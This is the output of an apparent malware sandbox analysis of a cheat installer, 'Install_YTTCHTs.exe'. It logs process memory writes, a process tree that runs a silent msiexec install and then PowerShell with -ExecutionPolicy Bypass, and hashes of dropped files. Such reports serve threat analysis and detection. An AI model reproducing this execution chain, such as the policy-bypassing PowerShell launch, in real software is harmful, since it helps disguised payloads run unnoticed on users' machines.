PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 608 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 608 wrote to memory of 2512 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 608 wrote to memory of 2512 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 608 wrote to memory of 2512 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 608 wrote to memory of 2512 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 965E27B242B28E8629FC17851B0E2E4D C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710529439 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7DD0C46338D9B1F5DBD09FE943C79951

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss70C0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi70BD.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr70BE.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr70BF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe

MD5 4deea68bf2d1d19148a82ed981c2ba51
SHA1 28df90ab2af2dccc76de4da8b26ed19ae666a474
SHA256 0b33f0d02ce1533cb1402c63907d08ddb07afa34a6267271d512e2910ebde51d
SHA512 3b180cbe1e7300ca62730926e76d296941377d1883b2fe6ba6b64255520a45777b161e024a1bb4491c56f145a79e2d7b1cd2e2a27ce5f66817628e9d56343c8b

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe

MD5 0055d4b56679cb57ee1b87853722eac8
SHA1 16e6533988e9067bdeb941a61dde5a552f7fa903
SHA256 cea7e61cc93a8b619fc59ac00c65c7a8babcd5142a8129d0c358ef235e76ea5a
SHA512 0f53cf0c6155de86758dbea04d90c5ff4fa8de6c7b19a729b10044e08bb6b71e4387520472537e91c3f2ac4f6be93d1613cc8b50eda9c79d1a2b3632649b159a

\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe

MD5 b3320ad741500c39bb0806698e4d1374
SHA1 cfa49c732413b08d819cad7f78b5ab16e8a40019
SHA256 7bf53f93286796164d3a0903ce116e1190ae067f99b4955d17a537fed66293bc
SHA512 36e2f00e0b36f0817af79f644b558f0329b97f432e07e8ac34a5e3bb90be6d81188ecd9da6de39e4a8af1cba658dfbc92c01ac5e09d993ef2732c5e4afdf9710

\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe

MD5 8f00212996d098d029a3825212a42d0f
SHA1 bd0ca6dc42ec40812b533b16d96792ba49c37f8a
SHA256 2a6e690de93e13e374e1cd63e35461bdb5261c6ef73ad09d4d18e4cbb2aca8e8
SHA512 ba60fbe72accc4bff5fa66ae05a8777524354ef9d4270301d9bfce34f0455178ebdee8e1d8cb45ccf773c02f2ca5b1e8845e5e60dfa5f8e862b7ea69e812a884

C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe

MD5 ee51531274c2743ae9b8112c919163dd
SHA1 ff20d05e99a4508a95e1643632295fd963eb438f
SHA256 dbc8959ebe696e18e43b64b24dfb660801a2d904866d3f126a21325ad96398f9
SHA512 c0a4a01ce0342b93c4a9e5b4de3c776f1c30ae069634aff22ba72ed8c83ccf21703f4cb7fd2545717430d649c9f9babf3cf99c6d29eb3adb6f66517f63788d84

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 b25da6a874c1c9d2c26e775d889f4c03
SHA1 7e08ef865daffe27331b0b67382480e7efc770e7
SHA256 8d1c26699cf9b708fbd69da54cb3dc205bfee43cbce05dbbfc22da12d48f5dbd
SHA512 c985d3ef991f1054b1d96b8c6a685a490ecc48c85d26d315ecb585d8370860ea9089bf55276908f8cfdc55bcf413e48a5b210025f5d2f7447863d16d6e09e46b

C:\Users\Admin\AppData\Local\Temp\Cab6AD6.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar6AE8.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

\Users\Admin\AppData\Local\Temp\MSI6C45.tmp

MD5 8f596da8add9194443cdd0441f45d486
SHA1 d19f31179b0b52f9ee4abe2a83bbd63e73573a6d
SHA256 157d277ad4cec35f4cfca2b204cc24332cd93bbdcfb6a6a06202cbcda66b21e8
SHA512 d7dc74634a0f0b1396297ca8f3ab2512e515be1d7da43ee46a1f4c58f29806f44ad32251839d50f378f54120acd4b7140c638f53e214b168b28629f42b9256fd

C:\Users\Admin\AppData\Local\Temp\MSI6C45.tmp

MD5 10cdf756d97187e7543e8a511905979e
SHA1 9b91987f00410785e688105bea0d5d4c58f85d93
SHA256 54987d89584da98df46b9e775f08d9057873a427079d527636ace020b33c0f9c
SHA512 90b2f5490f444139ae83f2966767348300da1b81e62a78af73280bc7290fa5337bab97977de51dd26037fec58da024927b07f038b97314aa6a6fecc752149f08

C:\Users\Admin\AppData\Local\Temp\MSI6D01.tmp

MD5 5f1ce6e76033518da9f1d77a36447571
SHA1 c96ae7e25a064e2350a19b49594402e1bc455cde
SHA256 a26b169c04a087ed1b1ed4509dbd9111e5183c6a75bf2612edace586a8f819a7
SHA512 bdfc941e5579289a7f3be881359b8de20f4c2682f961f3a6ad21c9e442ec09b5a2b2fc7ab5113885fc23dca14572f819fc7bde7262eb6fcd1c838ab5b32b9105

\Users\Admin\AppData\Local\Temp\MSI6D01.tmp

MD5 241620506524da2c15d58581c79919f2
SHA1 685ebe2afe30c8acbbd2c7b9aff612b993870a69
SHA256 894bbab64aeacdcf3b618f13604545f9ea32b74d21464a2517f12678544ec134
SHA512 867069207afd7f1c0d9b72307db27c71ab975c91948e557d693c8f80bf94f63366d37ec97e31e6f4697649a88c6afa8d83ea9f08f9aae0da0576e0454fc24a8d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 cd8252319260ece411370b6b0845141d
SHA1 5a62d483c0acecc15575d00b4462eca64cc884f8
SHA256 7b2b89f4b819e65d2f6152ccf5958337d32f91b76df74d6b78644cdea101f7e8
SHA512 58c7b708eb036224b680fb38763bdf28966d97ccebfddefea63e83a678c3706ecbab83ed1c12100ec7c0f79404c573f6eb00d52f1400303f192ef2682bdc7c61

C:\Users\Admin\AppData\Local\Temp\Cab6DEF.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 035ac947dbbcb8c73ad7e19aabc36409
SHA1 335ce8ed4ccf1801c840b255ff591f010bd0eeeb
SHA256 45ae2efe4fc7527bbf650e094d45cc37457195edbd8ced1d98557ae5f29def6f
SHA512 1f6675a517e7840a224df86f419ce137f1d5a2de9db7ff82064b08e04223d0dbcf5eaf7f67fb89a296cb105c955911a111d72dd4fc98782eb428208044bdab74

C:\Users\Admin\AppData\Local\Temp\Tar6E60.tmp

MD5 848d8965a0bcc9fd03895b0243a654a4
SHA1 f00d55438c706c91d74e0fff9d1863e5be259b3e
SHA256 a0bed995c5946089a258852273e1b7bf1a407b533ce43d9d64a8c45f698a13d0
SHA512 4dd27e968e7e947336c48708881904eeed335f010f948750cf932acf70509019c24083359bd27793ac26e614587890f23f629452fa01836cb2a842b185ec1412

\Windows\Installer\MSI6E9F.tmp

MD5 9591bd2b22bd2c04363c4516ff9b58e1
SHA1 934fd3c1955ada522bd2b669d264a77029fc9781
SHA256 8daa2d930b210cac1967a43aa7769baadd0bda3e483a38858546d977d4f2d06b
SHA512 bf65e1664d96888cc7b939dc07ef8f6f653ca62864e12b1c03fed44e09b6f1747d5d6da7e788f111f8563a9ff9a94f6407fc8e8bad6a9e84c5d81fc585112fb7

C:\Windows\Installer\MSI6E9F.tmp

MD5 99015b35f25ca6a4b779eddf96060a81
SHA1 95ecba99ce1892e8ebf2be03a02fbfbb119ec91c
SHA256 c4f44d511c514eb0b884272ac7dbcaf004e771e233e3f4b00be56094f68f9986
SHA512 ebb23389866f6746fcb0385887c21e20b45a0655736b1813f313b00978f1e33e4e1eea1c3af6b92051fa66144fb1bb84137ee5d291d251bd0915fa9738a35a54

C:\Windows\Installer\MSI6F2C.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Windows\Installer\MSI6FAA.tmp

MD5 8ddbd0d4ca29c11a018bea143b90f29a
SHA1 3dcc9e463a24a5142a9d29d7a110942263aa8e16
SHA256 2c97e27d5bd3c06a4402d10b0f0cdbbbf9defd727929f6e354b45c0d612f4fd1
SHA512 117215106efa45df5343f169e80234fae7cbeed72e2a679688cc0d507d75e7afb768c793517be0a6da30c187f0b690ce6ceb4307e8273664f036c2dace8ed3cd

\Windows\Installer\MSI6FAA.tmp

MD5 38f8a22f2d286ea60e8730e0c4fa2fb9
SHA1 0c242a3aa71e9742e3568c96bcbeb49aa12c94ef
SHA256 1a724bacaf20ffe6eb0aee0f2d3199fd29f2ef197574098e6147106b96de9017
SHA512 af1dacd6f3307dbda985f3f7b6da8385ec59a239f22a2ce2d8c7b26a9941426f15fcf51e9c89ddcee528598163c65d10fb0fddc0e9013f2dbcc8bb724742bd15

\Windows\Installer\MSI7076.tmp

MD5 017d7f0c544497256d099d120910dc6f
SHA1 ab949d6d962f6835e07e4f21380ef2fb6c762576
SHA256 6ec3d6ef916b76406e46f924d58cd9c420246faea169cbfc20ce41ba60da7c6b
SHA512 b3ac1f462d2e92516a8ef28747ff84d9a5d03795a1b3839b72f33cc4e59165e38939accf2ac17aeda3dfc56bebf6ab7174ce014866740810c813b6cdab0eb154

C:\Windows\Installer\MSI7076.tmp

MD5 c86e61c69104b74b92ab58f5040be5f8
SHA1 96d8ae5092db78e1415423530d98d32ccc3c5684
SHA256 f2ee4f49f7693630cd2f3fc307c4b826b403c7b4ebe6f4432f22f5576706d849
SHA512 e3e32b0e25982c18b3b03fbbc7b8db204874a3a88b34e683fea72aa8ff984104c8a0209c40b15fb1a5af5436c1078b2ba5b2c299bd2221104631937d5bb50ab7

memory/2512-3625-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

memory/2512-3624-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2512-3626-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

memory/2512-3627-0x0000000002E20000-0x0000000002EA0000-memory.dmp

memory/2512-3633-0x0000000002E20000-0x0000000002EA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

C:\Users\Admin\AppData\Local\Temp\scr70BE.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\scr70BF.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

memory/2512-3695-0x0000000002E20000-0x0000000002EA0000-memory.dmp

memory/2512-3696-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss70C0.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
